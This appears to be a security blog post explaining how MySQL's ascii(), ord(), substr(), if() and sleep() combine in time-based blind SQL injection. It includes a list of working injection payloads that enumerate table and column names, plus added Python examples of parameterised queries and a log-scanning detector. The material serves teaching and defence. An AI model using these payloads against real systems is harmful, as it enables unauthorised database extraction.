MySQL ord() and ascii()

# 0x00 Statement

```sql
if(ascii(substr(('str'),pos,len)),sleep(5),1)
```

## ASCII(str1)

Returns the ASCII code of the leftmost character of the string. If str is the empty string, it returns 0. If str is NULL, it returns NULL.

```
mysql> select ascii('hi');
+-------------+
| ascii('hi') |
+-------------+
|         104 |
+-------------+
1 row in set (0.00 sec)
```

```
mysql> SELECT ASCII('b') AS Lower_Case, ASCII('B') AS Upper_Case;
+------------+------------+
| Lower_Case | Upper_Case |
+------------+------------+
|         98 |         66 |
+------------+------------+
1 row in set (0.00 sec)
```

## ord(str)

The ord() function returns the ASCII value of the first character of the string; for a single-byte character this is the same value ascii() returns, which is why the two are interchangeable in the payloads below.

```
mysql> select ord('h');
+----------+
| ord('h') |
+----------+
|      104 |
+----------+
1 row in set (0.00 sec)
```

## substr()

The substr() function extracts part of a column's value, starting at position pos (1-based) and taking len characters.

```sql
substr(str,pos,len);
```

```
mysql> select substr(('Courtney'),1,9);
+--------------------------+
| substr(('Courtney'),1,9) |
+--------------------------+
| Courtney                 |
+--------------------------+
1 row in set (0.00 sec)
```

## The if() function

The form is: if(expr1,expr2,expr3)

  • If expr1 evaluates to true, the value of expr2 is returned;
  • If expr1 evaluates to false, the value of expr3 is returned.

In the example below 'L' has ASCII code 76, so the comparison with 0 is false, sleep(3) runs, and the query takes three seconds to return its result of 0. That delay is the only signal a time-based blind injection relies on.

```
mysql> select if(ascii(substr(('L'),1,1))=0,1,sleep(3));
+-------------------------------------------+
| if(ascii(substr(('L'),1,1))=0,1,sleep(3)) |
+-------------------------------------------+
|                                         0 |
+-------------------------------------------+
1 row in set (3.00 sec)
```
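The functions above are the building blocks of the time-based payloads in this post; the defence is to keep user input out of the SQL text altogether. The following Python script is an added example, not code from the original post: it runs the post's first payload against an in-memory SQLite table (constructed here, with an `emails` table named after the one the post's payloads reference) once through string concatenation and once through a bound parameter. SQLite has no `sleep()` or `if()`, so the concatenated statement fails instead of pausing, but the point is visible in the returned SQL text: only the concatenated version lets the input change the statement.

```python
import sqlite3

# Constructed in-memory table; "emails" mirrors the table name used in the post's payloads.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE emails (id INTEGER PRIMARY KEY, email TEXT NOT NULL)")
    conn.executemany("INSERT INTO emails VALUES (?, ?)",
                     [(1, "alice@example.test"), (2, "bob@example.test")])
    return conn

# The first payload from the post. In a URL the trailing '+' decodes to a space,
# which is what turns "--" into a valid end-of-line comment; it is written decoded here.
PAYLOAD = "' and if(1=0,1, sleep(10)) -- "

def lookup_concat(conn, email):
    """Vulnerable pattern: the user-supplied value becomes part of the SQL text."""
    sql = "SELECT id FROM emails WHERE email = '" + email + "'"
    try:
        return {"sql": sql, "rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:
        # In MySQL the same statement would parse and sleep; SQLite rejects it instead.
        return {"sql": sql, "rows": None, "error": str(exc)}

def lookup_bound(conn, email):
    """Hardened pattern: the statement text is fixed and the value travels as a parameter."""
    sql = "SELECT id FROM emails WHERE email = ?"
    return {"sql": sql, "rows": conn.execute(sql, (email,)).fetchall(), "error": None}

if __name__ == "__main__":
    db = make_db()
    for fn in (lookup_concat, lookup_bound):
        print(fn.__name__, fn(db, "alice@example.test")["rows"])
        print(fn.__name__, fn(db, PAYLOAD))
```

With the bound parameter the payload is simply a string that matches no e-mail address, and the statement the engine sees is the same one the developer wrote.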

## 0x01 Other common payloads

```sql
' and if(1=0,1, sleep(10)) --+
" and if(1=0,1, sleep(10)) --+
) and if(1=0,1, sleep(10)) --+
') and if(1=0,1, sleep(10)) --+
") and if(1=0,1, sleep(10)) --+
If(ascii(substr(database(),1,1))=115,sleep(10),1)

-- Get table names
and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>60 %23
-- Get column information
and (select length(column_name) from information_schema.columns where table_name=0x656d61696c73 limit 0,1)>[num] %23
-- Get column names
and ascii(substr((select column_name from information_schema.columns where table_name=0x656d61696c73 limit 0,1),1,1))>60 %23
-- Get the number of current records
and (select count(*) from emails)>0 %2
```
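To spot these payloads in web server logs, here is an added example that is not part of the original post and uses constructed log lines rather than real traffic: the script decodes each query-string parameter and matches it against the building blocks listed above, namely the `sleep()` delay, the `if()` conditional, `ascii()`/`ord()` over `substr()`, `information_schema` lookups, and the `--+`/`%23` comment terminators. The log format and the `/mail.php` path are assumptions made for the sample.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (not real traffic). The second and third requests
# carry the payload shapes from the post, URL-encoded the way a client would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /mail.php?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /mail.php?id=1%27%20and%20if(1%3D0%2C1%2C%20sleep(10))%20--+ HTTP/1.1" 200 512
10.0.0.7 - - [01/Jan/2024:10:00:12 +0000] "GET /mail.php?id=1%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema%3Ddatabase()%20limit%200%2C1)%2C1%2C1))%3E60%20%23 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:13 +0000] "GET /search.php?q=sleeping+bag HTTP/1.1" 200 2048
"""

# Each signature names one building block the post describes. They are applied to the
# *decoded* parameter value, so %27, %20, %23 and '+' no longer hide anything.
SIGNATURES = {
    "time_delay":         re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "conditional":        re.compile(r"\bif\s*\(", re.I),
    "char_extraction":    re.compile(r"\b(?:ascii|ord)\s*\(\s*substr", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "comment_terminator": re.compile(r"(?:--\s|#)\s*$"),
}

# Client IP and request target from a combined-log style line (assumed format).
REQUEST_LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

def classify_value(value):
    """Return the names of every signature that matches one decoded parameter value."""
    return [name for name, rx in SIGNATURES.items() if rx.search(value)]

def scan_log(text):
    """Parse each request line, decode its query string and report matching parameters."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_LINE.match(line)
        if not m:
            continue
        ip, target = m.group(1), m.group(2)
        # parse_qsl percent-decodes and turns '+' into a space, as the web server would.
        for param, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            reasons = classify_value(value)
            if reasons:
                findings.append({"ip": ip, "param": param, "value": value, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["param"], f["reasons"])
```

Signatures of this kind are a triage aid rather than a verdict: always match on the decoded value, and corroborate a hit with the response time recorded for the same request, since the whole point of these payloads is a measurable delay.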

## 0x03 sqlmap technique

Option: --technique

This option selects which detection techniques sqlmap uses; by default every technique is tried.

The supported techniques are:

B: Boolean-based blind SQL injection
E: Error-based SQL injection
U: UNION query SQL injection
S: Stacked queries SQL injection
T: Time-based blind SQL injection